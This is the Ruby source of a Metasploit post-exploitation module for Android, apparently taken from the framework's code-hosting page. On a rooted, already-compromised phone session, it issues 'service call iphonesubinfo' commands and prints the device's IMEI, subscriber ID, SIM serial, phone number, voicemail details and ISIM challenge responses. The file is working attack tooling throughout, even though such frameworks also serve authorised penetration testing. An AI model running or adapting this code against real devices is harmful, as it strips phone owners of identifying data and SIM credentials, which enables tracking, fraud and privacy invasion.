modules/post/android/gather/sub_info.rb from rapid7/metasploit-framework

modules/post/android/gather/sub_info.rb
Summary

Maintainability

4 hrs
Test Coverage

Issues
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post

  include Msf::Post::Common
  include Msf::Post::Android::Priv
  include Msf::Post::Android::System

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'extracts subscriber info from target device',
          'Description' => %q{
            This module displays the subscriber info stored on the target phone.
            It uses call service to get values of each transaction code like imei etc.
          },
          'License' => MSF_LICENSE,
          'Author' => ['Auxilus'],
          'SessionTypes' => [ 'meterpreter', 'shell' ],
          'Platform' => 'android'
        }
      )
    )
  end

  def run
    unless is_root?
      print_error('This module requires root permissions.')
      return
    end

    @transaction_codes ||= [
      'DeviceId',
      'DeviceIdForSubscriber',
      'ImeiForSubscriber',
      'DeviceSvn',
      'SubscriberId',
      'SubscriberIdForSubscriber',
      'GroupIdLevel1',
      'GroupIdLevel1ForSubscriber',
      'IccSerialNumber',
      'IccSerialNumberForSubscriber',
      'Line1Number',
      'Line1NumberForSubscriber',
      'Line1AlphaTag',
      'Line1AlphaTagForSubscriber',
      'Msisdn',
      'MsisdnForSubscriber',
      'VoiceMailNumber',
      'VoiceMailNumberForSubscriber',
      'CompleteVoiceMailNumber',
      'CompleteVoiceMailNumberForSubscriber',
      'VoiceMailAlphaTag',
      'VoiceMailAlphaTagForSubscriber',
      'IsimImpi',
      'IsimDomain',
      'IsimImpu',
      'IsimIst',
      'IsimPcscf',
      'IsimChallengeResponse',
      'IccSimChallengeResponse'
    ]
    values ||= []
    arr ||= []
    for code in 1..@transaction_codes.length do
      print_status("using code : #{code}")
      cmd = "service call iphonesubinfo #{code}"
      block = cmd_exec(cmd)
      value, tc = get_val(block, code)
      arr << [tc, value]
    end

    tc_tbl = Rex::Text::Table.new(
      'Header' => 'Subscriber info',
      'Indent' => 1,
      'Columns' => ['transaction code', 'value']
    )

    arr.each do |a|
      tc_tbl << [
        a[0],     #  TRANSACTION CODE
        a[1]      #  value
      ]
    end
    print_line(tc_tbl.to_s)
  end

  def get_val(data, code)
    parsed = data.gsub(/Parcel/, '')
    string = ''
    100.times do |i|
      next if i % 2 == 0

      str = parsed.split("'")[i]
      break if str.nil?

      string += str
    end
    v = ''
    string.split('.').each do |chr|
      next if chr.nil? || (chr == "\n")

      v += chr
    end
    return v, @transaction_codes[code - 1]
  end
end